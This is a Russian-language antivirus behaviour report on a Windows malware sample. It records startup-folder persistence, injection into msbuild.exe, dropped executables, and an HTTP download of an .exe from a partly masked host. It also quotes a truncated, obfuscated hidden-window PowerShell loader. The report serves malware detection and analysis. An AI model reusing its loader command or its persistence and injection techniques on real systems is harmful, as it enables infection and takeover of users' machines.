Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\chtime.url
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function f679cf {param($s1d1b)$ub19ae1='ub4dc8';$yd81e7='';for ($i=0; $i -lt $s1d1b.length;$i+=2){$f4a1f12=[convert]::ToByte($s1d1b.Substring($i,2),16);$yd81e7+=[char]($f4...
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\nmwmmnfj.0.cs
- %TEMP%\nmwmmnfj.cmdline
- %TEMP%\nmwmmnfj.out
- %TEMP%\cscfad3.tmp
- %TEMP%\resfad4.tmp
- %TEMP%\nmwmmnfj.dll
- %APPDATA%\v9b95ba.exe
- %HOMEPATH%\chtime\chtime.vbs
- %HOMEPATH%\chtime\audiosrv.exe
Удаляет следующие файлы
- %TEMP%\resfad4.tmp
- %TEMP%\cscfad3.tmp
- %TEMP%\nmwmmnfj.dll
- %TEMP%\nmwmmnfj.pdb
- %TEMP%\nmwmmnfj.cmdline
- %TEMP%\nmwmmnfj.0.cs
- %TEMP%\nmwmmnfj.out
Сетевая активность
TCP
Запросы HTTP GET
- http://da##o.pk/BCyph_test_app.exe
UDP
- DNS ASK cu#t.ly
- DNS ASK da##o.pk
Другое
Создает и запускает на исполнение
- '%APPDATA%\v9b95ba.exe'
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFAD4.tmp" "%TEMP%\CSCFAD3.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nmwmmnfj.cmdline"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nmwmmnfj.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFAD4.tmp" "%TEMP%\CSCFAD3.tmp"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe'
